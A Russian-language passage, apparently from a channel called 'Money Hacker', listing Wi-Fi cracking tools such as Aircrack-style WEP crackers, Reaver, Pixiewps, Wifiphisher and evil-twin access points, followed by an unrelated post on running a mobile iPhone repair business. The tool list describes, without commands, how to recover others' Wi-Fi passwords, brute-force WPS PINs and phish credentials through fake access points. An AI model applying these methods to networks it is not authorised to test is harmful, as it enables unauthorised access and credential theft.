AirSnort — это еще одна популярная утилита для получения пароля от Wifi сети. Только работает она лишь с WEP сетями. Пароль перебирается с помощью специальных алгоритмов. Программа мониторит все передаваемые в сети данные, и когда перехватывает достаточное количество пакетов — расшифровывает из них пароль. Доступна для Linux и Windows, а также очень проста в использовании. Последний раз программа обновлялась три года назад, но она все еще актуальна и работает.

3. KISMET

Kismet — программа другого типа. Это анализатор беспроводных сетей WiFi 802.11a/b/g/n и система обнаружения вторжений. Очень часто этот инструмент используется для решения проблем с сетями Wifi. Kismet отлично работает со всеми wifi картами, которые поддерживают режим монитора. Поддерживает Windows, Linux, MacOS и BSD. Программа позволяет перехватывать пакеты разных протоколов — a/b/g/n, а также обнаруживать скрытые сети. Если к компьютеру подключен GPS, то программа может сохранять место где была найдена сеть на карту.

4. FERN WIFI WIRELESS CRACKER

Еще один неплохой инструмент, который поможет улучшить безопасность беспроводных сетей. Он позволяет просматривать передаваемые пакеты в реальном времени, а также обнаруживать устройства, подключенные к сети. Программа была разработана для выявления недостатков в протоколах сетей и их устранения. Работает на Linux, Windows, MacOS.

Программа может восстанавливать ключи WEP/WPA так же, как это делает Aircrack, а также ключи WPS методом перебора. Также может использоваться для тестирования сетей Ethernet. Для взлома ключей WPA/WPA2 используется перебор по словарю, а для WEP доступны такие алгоритмы: Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay. Инструмент активно разрабатывается и постоянно получает новые функции.

5. COWPATTY

CoWPAtty — программа для взлома wi fi на пк методом перебора паролей WPA/WPA2 с использованием радужных таблиц. Это вариант атаки по словарю, который работает немного быстрее обычного перебора. Утилита не умеет перехватывать рукопожатия. Ей нужно передать уже перехваченные пакеты. Работает все в интерфейсе командной строки. Если пароль есть в списке, то программа его найдет. Но скорость работы программы очень сильно зависит от сложности паролей и их количества.

Для обозначения имени SSID используется SHA1, а это означает что для разных точек доступа придется создавать новую радужную таблицу. В новых версиях разработчики попытались увеличить скорость с помощью использования файла хэшей, который содержит 172000 записей и более 1000 самых популярных SSID.

6. AIRJACK

Airjack выполняет функции, схожие с aireplay. Это утилита для отправки пакетов в беспроводную сеть. Она может использоваться для выполнения атак отказа в обслуживании и MITM атак. Это может быть полезно при создании фейковой точки доступа, когда вам нужно заглушить основную.

7. WEPATTACK

Еще один простой инструмент для взлома паролей для сетей WEP. Как и предыдущие подобные инструменты в списке он позволяет восстанавливать пароль из достаточного количества перехваченных пакетов. Но для работы программы нужна карта с поддержкой режима монитора.

8. WIFIPHISHER

Работа этого инструмента очень сильно отличается от того что мы видели ранее. Если все описанные выше инструменты нацелены на технические уязвимости протокола, то здесь используется социальный инжиниринг. Утилита получает пароль от WPA/WPA2 сети методом фишинга. Она отключает пользователя от его сети и подключает к своей. А затем выдает в браузере сообщение, что пользователь должен ввести пароль от Wifi для установки обновлений. Затем пароль передается взломщику, а пользователь продолжает пользоваться интернетом не подозревая что произошло.

9. REAVER

Reaver — это программа для взлома пароля wifi, которая позволяет получать пароль от сетей WPS путем прямого перебора. Работа утилиты основана на том, что PIN WPS можно пробовать неограниченное количество раз. Обновлялся последний раз 4 года назад и большинство роутеров уже получили защиту от уязвимости, но не все.

10. WIFITE

Wifite — инструмент, похожий на Reaver, тоже написанный на Python и тоже предназначенный для взлома сетей WPS. Действует аналогичным методом перебора, но более новый и имеет несколько дополнительных функций. Работает только в Linux.

11. WEPDECRYPT

WepDecrypt — инструмент для взлома WEP сетей, написанный на Си. Поддерживаются несколько методов взлома ключей, начиная от атаки по словарю и заканчивая алгоритмами анализа. Для работы программы нужны некоторые системные библиотеки.

12. PYRIT

Pyrit — отличный инструмент для выполнения атак перебора по словарю на протоколы WPA/WPA2. Написан на Python и может работать на FreeBSD, Linux, Windows и MacOS. Утилита поддерживает параллельные вычисления с помощью видеокарты, используя Cuda или OpenCL, а значит может быть очень эффективной. Но это все еще атака по словарю, а значит чем сложнее пароль, тем он безопаснее.

13. INFERNAL TWIN

Evil twin (злой двойник) — это инструмент для создания фейковой точки доступа Wifi. Пользователь подключается не оригинальной точке доступа, а к фейковой и передает ей свои данные. Она может использоваться для кражи паролей, перехвата трафика, фишинга и многого другого.

14. PIXIEWPS

Pixiewps — это новый инструмент для подбора PINов к WPS написанный на Си. Поддерживается перебор PIN офлайн без подключения к сети, поиск уязвимых сетей и использование атаки Pixie Dust. Для работы нужна модифицированная версия Wifite или Reaver.

15. CRUNCH

Простая утилита, которую можно использовать для генерации списков слов и словарей на основе определенных последовательностей.

*********************************************************

Money Hacker - ПОДПИШИСЬ!

Заработок на выездном ремонте техники Apple

2018-08-24T16:28:07.151Z

Сегодня подготовил для вас схему, которая описывает принцип работы и некоторые фишки такой ниши, как выездной ремонт Apple техники! И так, поехали!

Делаем ценники ниже "топовых" контор, чем в Вашем городе. Изучите свою ЦА, но на практике огромным спросом пользуется у людей, с хорошим достатком, потому что им никуда не нужно ехать.

На первое время закуп расходников и запчастей делайте у самого "бюджетного" поставщика в Вашем городе, нет смысла заказывать с Китая, ждать 20 дней из за экономии до 500 рублей (здесь главный фактор, это быстрота сервиса).

У большинства людей рабочий график совпадает с графиком ремонтных мастерских, другая категория людей слишком ценит своё время, и услуга по ремонту айфонов с выездом на дом или в офис просто находка. Чистая прибыль с ремонта одного айфона составляет от 1500 до 5000 рублей.

Рассмотрим пример с заменой дисплея. Среднее время ремонта 25-30 минут, стоимость китайского дисплея 2000 рублей, наша наценка на дисплей 1500 рублей, услуга замены - 2000 рублей, итого 3500 рублей с одного выезда.

Конструкция айфона позволяет производить все работы без использования паяльника, всё, что нужно - набор отверток и медиатор.

Далее с приливом финансов и изучением топов ремонтов (как правило на первом месте это дисплейная сборка) заказывайте уже с Китая хорошими партиями от 20 штук.

Реклама. Реклама самый топ считаю инстаграм и сарафан, не мучайтесь с лендингом, версткой и Директом, зря тратите время! Но никогда не жадничайте на рекламе, это ваши заказы и деньги! Мастеров ищите двух, первый это модульщик, который меняет расходники (дисплей, АКБ) - на первое время этого вполне хватит.

Далее мастер по пайке плат, там уже когда у Вас появляются какие либо достаточные финансы сразу снимите ему небольшое место (9кв метров вполне хватит пайщику) и прикупите ему начальное оборудование. Пайщик чинит платы (реболл микросхем и чистка после влаги) Но здесь уже нужен курьер, который привозит ремонтопригодные платы Ваших клиентов пайщику.

И самое важное правило, Ваш клиент не должен ехать к Вам сам, вы должны приехать к нему для максимального комфорта вашего Сервиса!

P.S. Как вариант, можете объединиться с человеком, который продает RFB (восстановленные) iPhone, вы будете за три копейки чинить ему iPhone по гарантии (кто сталкивался с RFB iPhone, точно меня поймет) Он в свою очередь своим клиентам будет советовать только Ваш сервис, давая, например, с чеком Вашу визитку. Вот такое партнерство.